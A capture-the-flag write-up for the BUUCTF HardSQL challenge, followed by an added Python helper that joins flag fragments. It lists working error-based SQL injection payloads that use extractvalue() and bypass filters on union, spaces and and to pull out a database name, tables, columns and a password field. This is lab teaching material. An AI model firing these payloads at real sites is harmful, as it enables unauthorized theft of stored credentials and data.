BUUCTF——[Geek Challenge 2019]HardSQL

Open the challenge and try ordinary injection first; it does not work. union, spaces and and are filtered. Switch to error-based injection with extractvalue() and start working through the challenge. It is recommended to capture the request with Burp while working in the web page. Put on your pain mask first (that is, be patient, hehe).
First, extract the database name:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23


With the database name obtained, get the table name:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

Extract the column names:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

Query the password column:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1))))%23

The flag is not shown in full here, but the right() and left() functions can be used to view it:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(right(password,30))from(H4rDsq1))))%23

Splice the two parts together, taking care to remove the duplicated part in the middle, and then you can submit the flag.
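
The splicing step above, as an added example that is not part of the original write-up: a small Python helper that joins the two fragments on their longest overlap instead of by eye. The flag value and both fragments are constructed sample data, and the names `splice`, `_strip_marker` and the `expected_len` parameter are assumptions of this example.

```python
# Added example: constructed sample data, not the challenge's real flag.
SAMPLE_FLAG = "flag{3f1c9a52-7b4e-4d0a-9c11-5e2a8b6d7f90}"
# What the two error messages would show: '~' (0x7e) plus part of the value.
LEFT_FRAGMENT = "~" + SAMPLE_FLAG[:31]    # start of the value, cut off
RIGHT_FRAGMENT = "~" + SAMPLE_FLAG[-30:]  # result of right(password,30)


def _strip_marker(fragment: str) -> str:
    """Remove the single leading '~' that concat(0x7e, ...) adds."""
    return fragment[1:] if fragment.startswith("~") else fragment


def splice(left_part: str, right_part: str, expected_len=None) -> str:
    """Join the start and end of one value, dropping the duplicated middle.

    expected_len is a hypothetical optional check for when the full length
    of the value is known; a mismatch means the overlap was mis-detected.
    """
    left_part = _strip_marker(left_part)
    right_part = _strip_marker(right_part)
    # Longest overlap first, so the whole duplicated run is removed once.
    for size in range(min(len(left_part), len(right_part)), 0, -1):
        if left_part.endswith(right_part[:size]):
            joined = left_part + right_part[size:]
            if expected_len is not None and len(joined) != expected_len:
                continue  # accidental match; try a shorter overlap
            return joined
    raise ValueError("fragments do not overlap: a middle piece is missing")


if __name__ == "__main__":
    print(splice(LEFT_FRAGMENT, RIGHT_FRAGMENT, expected_len=len(SAMPLE_FLAG)))
```

If the function raises `ValueError`, the two fragments do not cover the whole value and a further fragment is needed before the pieces can be joined.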
